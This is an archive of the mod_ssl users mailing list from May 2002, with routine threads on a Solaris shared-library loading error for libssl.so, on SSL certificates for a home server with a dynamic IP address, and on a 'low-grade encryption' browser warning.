bGQgZ2l2ZSBtZSBhIGNvbnNpc3RlbnQgbmFtZSB0aGF0IHdvdWxkIHNhdGlzZnkgdGhlIFNTTCAN
CiAgY2VydGlmaWNhdGUgbmFtZSBtYXRjaGluZy4mbmJzcDsgV2hlbiBteSBJUCBhZGRyZXNzIGNo
YW5nZXMsIGFsbCBJJ2QgbmVlZCB0byANCiAgZG8gaXMgdXBkYXRlIG15IGh0dHBkLmNvbmYgZmls
ZSB0byByZWZsZWN0IHRoZSBuZXcgSVAgYWRkcmVzcyB0byByZXNwb25kIHRvIA0KICBhbmQgdGhl
IFNTTCBjZXJ0aWZpY2F0ZSBzaG91bGQgbmV2ZXIga25vdyB0aGUgZGlmZmVyZW5jZS4gDQogIDxQ
Pkkga25vdyB0aGF0IHRoaXMgaXMgYSByZXZlcnNlIEROUyBmdW5jdGlvbiBvZiBzb3J0cyBhbmQg
SSdtIHByZXR0eSBzdXJlIA0KICB0aGF0IHRoZXJlJ3MgYSB3YXkgb2YgZG9pbmcgaXQsIGJ1dCBz
byBmYXIgSSd2ZSByZWFkIGFsbCB0aGUgZG9jdW1lbnRhdGlvbiANCiAgdGhhdCBJIGNvdWxkIGZp
bmQgb24gaHR0cGQuY29uZiBjb25maWd1cmF0aW9uLCBidXQgc3RpbGwgaGF2ZW4ndCBoYWQgYW55
IA0KICBsdWNrLiZuYnNwOyBJJ2Qgc3VyZSBhcHByZWNpYXRlIGFueSBoZWxwIHRoYXQgeW91IGNv
dWxkIHByb3ZpZGUuIA0KICA8UD5UaGFua3MgPFBSRT4tLSZuYnNwOw0KSmFjayBKYWNvYnNlbg0K
amNqQGNmbC5yci5jb20NClZvaWNlICg0MDcpIDYzNi05NDU4DQpGQVgmbmJzcDsmbmJzcDsgKDQw
NykgNjMyLTgxODk8L1BSRT4mbmJzcDsgDQogIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gQXBhY2hlIA0KICBJbnRl
cmZhY2UgdG8gT3BlblNTTCAobW9kX3NzbCkgd3d3Lm1vZHNzbC5vcmcgVXNlciBTdXBwb3J0IE1h
aWxpbmcgTGlzdCANCiAgbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcgQXV0b21hdGVkIExpc3QgTWFu
YWdlciBtYWpvcmRvbW9AbW9kc3NsLm9yZyANCjwvQkxPQ0tRVU9URT48L0JPRFk+PC9IVE1MPg0K

------=_NextPart_000_00A1_01C1F66C.98CC20E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 18:56:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA21972; Wed, 8 May 2002 18:55:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id SAA21914; Wed, 8 May 2002 18:54:17 +0200 (MET DST)
Received: (qmail 37790 invoked by uid 908); 8 May 2002 16:54:14 -0000
Date: Wed, 8 May 2002 12:54:14 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <20020508125414.A37299@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ok, am I doing something dumb?

Solaris 8
OpenSSL-0.9.6c - config shared -fPIC
MM-1.1.3 - configure --disable-shared
Apache 1.3.24
mod_ssl-2.8.8-1.3.24
configure --with-apache="/local/app1/apache/apache_1.3.24"
--with-ssl="/local/app1/openssl/openssl-0.9.6c"
--with-mm="/local/app1/apache/mm-1.1.3"
--prefix="/local/webhome/apache-1.3.24" --enable-shared="ssl"

HTTP works fine.  SSL dies on startup:

/local/webhome/apache/bin/apachectl startssl
Syntax error on line 206 of /local/webhome/apache-1.3.24/conf/httpd.conf:
Cannot load /local/webhome/apache/libexec/libssl.so into server: ld.so.1: /local/webhome/apache-1.3.24/bin/httpd: fatal: libssl.so.0.9.6: open failed: No such file or directory
/local/webhome/apache/bin/apachectl startssl: httpd could not be started

Originally I was using 'config shared' on OpenSSL, I added -fPIC
though I believe it is redundant.  No change.

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 19:50:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25810; Wed, 8 May 2002 19:49:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id TAA25744; Wed, 8 May 2002 19:48:30 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id C69712C42
	for ; Wed,  8 May 2002 19:48:29 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 1B9B02C80; Wed,  8 May 2002 19:48:27 +0200 (METDST)
Date: Wed, 8 May 2002 19:48:26 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <20020508174826.GA15593@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20020508125414.A37299@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020508125414.A37299@sidehack.sat.gweep.net>
User-Agent: Mutt/1.3.27i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, May 08, 2002 at 12:54:14PM -0400, MegaZone wrote:
> Ok, am I doing something dumb?
> 
> Solaris 8
> OpenSSL-0.9.6c - config shared -fPIC
> MM-1.1.3 - configure --disable-shared
> Apache 1.3.24
> mod_ssl-2.8.8-1.3.24
> configure --with-apache="/local/app1/apache/apache_1.3.24"
> --with-ssl="/local/app1/openssl/openssl-0.9.6c"
> --with-mm="/local/app1/apache/mm-1.1.3"
> --prefix="/local/webhome/apache-1.3.24" --enable-shared="ssl"
> 
> HTTP works fine.  SSL dies on startup:
> 
> /local/webhome/apache/bin/apachectl startssl
> Syntax error on line 206 of /local/webhome/apache-1.3.24/conf/httpd.conf:
> Cannot load /local/webhome/apache/libexec/libssl.so into server: ld.so.1: /local/webhome/apache-1.3.24/bin/httpd: fatal: libssl.so.0.9.6: open failed: No such file or directory
> /local/webhome/apache/bin/apachectl startssl: httpd could not be started
> 
> Originally I was using 'config shared' on OpenSSL, I added -fPIC
> though I believe it is redundant.  No change.

Dear Sir or Madam (whatever your real name might be)!

apachectl tells you, that it cannot load the shared library named
libssl.so.0.9.6, that seems to be referenced by libssl.so. Is libssl.so
a symbolic link? To which location does it point? Is the file really there?

Regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:07:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27126; Wed, 8 May 2002 20:06:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id UAA27002; Wed, 8 May 2002 20:05:06 +0200 (MET DST)
Received: (qmail 45076 invoked by uid 908); 8 May 2002 18:05:04 -0000
Date: Wed, 8 May 2002 14:05:04 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <20020508140504.A44809@sidehack.sat.gweep.net>
References: <20020508125414.A37299@sidehack.sat.gweep.net> <20020508174826.GA15593@serv01.aet.tu-cottbus.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020508174826.GA15593@serv01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, May 08, 2002 at 07:48:26PM +0200
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time Lutz Jaenicke shaped the electrons to say...
> Dear Sir or Madam (whatever your real name might be)!

My full legal name really is MegaZone.

And I have XY chomosomes. ;-)

But 'Sir' is so formal...

> apachectl tells you, that it cannot load the shared library named
> libssl.so.0.9.6, that seems to be referenced by libssl.so. Is libssl.so
> a symbolic link? To which location does it point? Is the file really there?

It is not a symbolic link, and it is there.

-rwxr-xr-x   1 root     other     286000 May  8 12:40 libssl.so

I think I recall seeing something about the linker on Solaris 8 - Sun
vs GNU.  But I can't seem to find anything now.

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:12:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27756; Wed, 8 May 2002 20:11:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA27717; Wed, 8 May 2002 20:10:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 395CE4CE764; Wed,  8 May 2002 20:10:34 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g48I92O79032; Wed, 8 May 2002 20:09:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id IAA04931; Wed, 8 May 2002 08:22:06 +0200 (MET DST)
Date: Wed, 8 May 2002 08:22:06 +0200 (MET DST)
Message-Id: <200205080622.IAA04931@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] "low-grade encryption" error from NS (PR#703)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Fhar
Version: 2.8.7
OS: Mac OS X Server
Submission from: (NULL) (209.204.179.100)


I'm running Mac OS X Server with an ssl-aware web server using a self-signed
key.  When i try to access our site using Netscape 6, i'm presented with a
warning stating that the site is using low-grade encryption.  I didn't change
anything to make this happen and adding the cipher suite directive to httpd.conf
does not seem to help.  Why am i getting this warning?  What can i do about it?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:12:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27772; Wed, 8 May 2002 20:11:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA27720; Wed, 8 May 2002 20:10:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 626B34CE768; Wed,  8 May 2002 20:10:34 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g48I9A679044; Wed, 8 May 2002 20:09:10 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vonemailsweep1.voneaccount.com id JAA09818; Wed, 8 May 2002 09:30:15 +0200 (MET DST)
Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Wed, 8 May 2002 08:31:51 +0100
Subject: Re: Dynamic IP Addressing
To: modssl-users@modssl.org
From: mike.innes@Oneaccount.com
Date: Wed, 8 May 2002 08:30:03 +0100
Message-ID: 
X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.8 |June
 18, 2001) at 05/08/2002 08:30:03 AM
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA09880
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mike.innes@Oneaccount.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Jack,
The point of the certificate is that you can't change the domain name presented to the browser (as it's in the cert) so that world knows you are who
you say you are as somebody
else (the certificate authority) who issued the cert is trusted by the general public.
A fixed IP is the best solution, another option (although not secure when your IP changes) is to use a dynamic DNS service such as
http://www.dyndns.org/
I would not recommend using a dynamic DNS system with https for any kind of serious or business purpose.
Mikey


>The problem is that I'd like to offer SSL as a feature of my home download server.  I've got a broadband connection with a company that doesn't offer
 static IP
>addressing for it's users, so my home IP address changes now and then.  I then simply have to go to the main site and update my link to the server to
 reflect
>t.he new IP address and I'm back in business, but I'm wondering if this will prohibit me from using SSL.  I'm not sure how to overcome the name
matching that
>the SSL certificate requires.  I can't apply for a certificate using an IP address for an identity, because it'll change, but I also can't use the
domain name of my
>computer because my client's browser's see only the IP address used for access.
>
>What I'd like to know is if there's any way to configure Apache+mod-ssl to return my computer's domain name, even if it's accessed by way of it's IP
address?
>That would give me a consistent name that would satisfy the SSL certificate name matching.  When my IP address changes, all I'd need to do is update
my
>httpd.conf file to reflect the new IP address to respond to and the SSL certificate should never know the difference.
>
>I know that this is a reverse DNS function of sorts and I'm pretty sure that there's a way of doing it, but so far I've read all the documentation
that I could find on
>httpd.conf configuration, but still haven't had any luck.  I'd sure appreciate any help that you could provide.
>
>Thanks --
>Jack Jacobsen
>jcj@cfl.rr.com
>Voice (407) 636-9458
>FAX   (407) 632-8189



All telephone calls are recorded and may be monitored.

E-mail communication is not secure and may be intercepted
by a third party. This message is confidential to the intended addressee.
If you are not the intended addressee, please inform us immediately and then
delete this message. Virgin One account does not accept responsibility for
changes made to this message after it was sent. Although Virgin One account
believes this e-mail is free of any virus or other defect which may affect a
computer, it is the responsibility of the recipient to ensure that it is
virus free and Virgin One account does not accept any responsibility for any
loss or damage arising from its use.

The Virgin One account is a secured personal bank account with The Royal Bank
of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an
Introducer representative only of Virgin Money Personal Financial Service Ltd,
which is authorised by the Financial Services Authority for life insurance,
pension and unit trust business and represents only the Virgin Money marketing
group.

Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK.
Registered in England no 3414708.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:17:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA28332; Wed, 8 May 2002 20:16:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco-exch.vasco.com id UAA28270; Wed, 8 May 2002 20:15:58 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco-exch.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 8 May 2002 20:12:52 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 8 May 2002 18:15:56 UT
Date: Wed, 8 May 2002 14:17:46 -0400
MIME-Version: 1.0
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <3CD9338A.23557.4CD4F35D@localhost>
In-reply-to: <20020508140504.A44809@sidehack.sat.gweep.net>
References: <20020508174826.GA15593@serv01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, May 08, 2002 at 07:48:26PM +0200
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 08 May 2002 18:12:53.0277 (UTC) FILETIME=[F892C4D0:01C1F6BB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> My full legal name really is MegaZone.
> 
> And I have XY chomosomes. ;-)
> 
> But 'Sir' is so formal...
> 
> > apachectl tells you, that it cannot load the shared library named
> > libssl.so.0.9.6, that seems to be referenced by libssl.so. Is
> > libssl.so a symbolic link? To which location does it point? Is the
> > file really there?
> 
> It is not a symbolic link, and it is there.
> 
> -rwxr-xr-x   1 root     other     286000 May  8 12:40 libssl.so
Uh, this isn't the file apache is looking for. It's looking for libssl.so.0.9.6. You probably have to set up that symlink.
Aryeh

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:29:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA29396; Wed, 8 May 2002 20:28:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id UAA29364; Wed, 8 May 2002 20:27:54 +0200 (MET DST)
Received: (qmail 47888 invoked by uid 908); 8 May 2002 18:27:53 -0000
Date: Wed, 8 May 2002 14:27:52 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <20020508142752.A47584@sidehack.sat.gweep.net>
References: <20020508174826.GA15593@serv01.aet.tu-cottbus.de>; <20020508140504.A44809@sidehack.sat.gweep.net> <3CD9338A.23557.4CD4F35D@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <3CD9338A.23557.4CD4F35D@localhost>; from aryeh@vasco.com on Wed, May 08, 2002 at 02:17:46PM -0400
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time Aryeh Katz shaped the electrons to say...
> > -rwxr-xr-x   1 root     other     286000 May  8 12:40 libssl.so
> Uh, this isn't the file apache is looking for. It's looking for libssl.so.0.9.6. You probably have to set up that symlink.

Already tried that.  Symlinks and a copy of the file out of 
/usr/local/ssl/lib/  It was the first thing I did.

Same error.

That's why I think it is something in libssl.so that is trying to use
the linker and failing.

The libssl.so is being placed there by the 'make install'.

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris

































































> 
> ---
> Aryeh Katz
> VASCO 			
> www.vasco.com		
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 20:43:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA00291; Wed, 8 May 2002 20:42:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id UAA00236; Wed, 8 May 2002 20:41:24 +0200 (MET DST)
Received: (qmail 49155 invoked by uid 908); 8 May 2002 18:41:22 -0000
Date: Wed, 8 May 2002 14:41:22 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Message-ID: <20020508144122.A49008@sidehack.sat.gweep.net>
References: <20020508174826.GA15593@serv01.aet.tu-cottbus.de>; <20020508140504.A44809@sidehack.sat.gweep.net> <3CD9338A.23557.4CD4F35D@localhost> <20020508142752.A47584@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020508142752.A47584@sidehack.sat.gweep.net>; from megazone@megazone.org on Wed, May 08, 2002 at 02:27:52PM -0400
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time MegaZone shaped the electrons to say...
> That's why I think it is something in libssl.so that is trying to use
> the linker and failing.

That neuron finally woke up.

I added /usr/local/ssl/lib to LD_LIBRARY_PATH

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 22:25:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA06784; Wed, 8 May 2002 22:24:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA06693; Wed, 8 May 2002 22:23:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CB7104CE764; Wed,  8 May 2002 22:23:15 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g48IAta79631; Wed, 8 May 2002 20:10:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id TAA26037; Wed, 8 May 2002 19:52:20 +0200 (MET DST)
Received: (qmail 9265 invoked from network); 8 May 2002 17:58:18 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 8 May 2002 17:58:18 -0000
Message-ID: <3CD963B4.3010806@thenewpush.com>
Date: Wed, 08 May 2002 11:43:16 -0600
From: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
References: <3CD8B539.866EC414@cfl.rr.com> <00a401c1f696$8263f240$0500a8c0@rdcss.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

robert@rdcss.com wrote:
> www.zoneedit.com  they can allow you to have a 
> domain name tagged thru a dynamic ip address.  you have to host the 
> domain name they host your dns for the domain name.

And than, in the Apache conf, you can just use the default
setting for your SSL virtual host (the one that is already there)
and you will be in business. You might want to consider geting a real cert
though if your site will be public.

-- 
Cheers,
	Balázs

-----------------------------------------------------
Balázs Nagy                           TheNewPush, LLC
Managing Partner                 tel. +1-303-523-5729
Research & Development           fax. +1-720-294-0933
=======>Internet Infrastructure and Presence Provider
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 07:33:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA14969; Thu, 9 May 2002 07:32:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp-server6.tampabay.rr.com id HAA14925; Thu, 9 May 2002 07:31:24 +0200 (MET DST)
Received: from cfl.rr.com (106.99.35.65.cfl.rr.com [65.35.99.106])
	by smtp-server6.tampabay.rr.com (8.12.2/8.11.2) with ESMTP id g495VMDn004533
	for ; Thu, 9 May 2002 01:31:22 -0400 (EDT)
Message-ID: <3CDA092F.76875C79@cfl.rr.com>
Date: Thu, 09 May 2002 01:29:19 -0400
From: Jack Jacobsen 
Organization: Phoenix AMS
X-Mailer: Mozilla 4.78C-SGI [en] (X11; I; IRIX 6.5 IP22)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Jacobsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Mikey,

I can see why presenting a different name or URL alias wouldn't be such a good thing after all.  I think that I may need to look into establishing a
static IP address.  That seems to be the only reliable way around the problem.

Thanks for your help.


mike.innes@Oneaccount.com wrote:

> Jack,
> The point of the certificate is that you can't change the domain name presented to the browser (as it's in the cert) so that world knows you are who
> you say you are as somebody
> else (the certificate authority) who issued the cert is trusted by the general public.
> A fixed IP is the best solution, another option (although not secure when your IP changes) is to use a dynamic DNS service such as
> http://www.dyndns.org/
> I would not recommend using a dynamic DNS system with https for any kind of serious or business purpose.
> Mikey
>
>

--
Jack Jacobsen
jcj@cfl.rr.com
Voice (407) 636-9458
FAX   (407) 632-8189



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 07:43:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA15568; Thu, 9 May 2002 07:42:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp-server6.tampabay.rr.com id HAA15499; Thu, 9 May 2002 07:42:09 +0200 (MET DST)
Received: from cfl.rr.com (106.99.35.65.cfl.rr.com [65.35.99.106])
	by smtp-server6.tampabay.rr.com (8.12.2/8.11.2) with ESMTP id g495g8Dn006604
	for ; Thu, 9 May 2002 01:42:08 -0400 (EDT)
Message-ID: <3CDA0BB5.EE451328@cfl.rr.com>
Date: Thu, 09 May 2002 01:40:05 -0400
From: Jack Jacobsen 
Organization: Phoenix AMS
X-Mailer: Mozilla 4.78C-SGI [en] (X11; I; IRIX 6.5 IP22)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
References: <200205080730.g487Uom21716@splat.grant.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Jacobsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for the information!  As long as I continue to have dynamic IP
addressing, a DNS system like dyndns.org may be the only reasonable
solution.  I really appreciate your suggestion, in fact I didn't even
realize that there was such a thing until you were nice enough to mention
it.  I honestly can't believe how great the support has been from the
MARC site.  Thanks much for being a part of it!

Jack Jacobsen


Michael Grant wrote:

> Jack,
>
> Would something like www.dyndns.org help you?
>
> Michael Grant
>

--
Jack Jacobsen
jcj@cfl.rr.com
Voice (407) 636-9458
FAX   (407) 632-8189



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 07:55:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA16287; Thu, 9 May 2002 07:54:17 +0200 (MET DST)
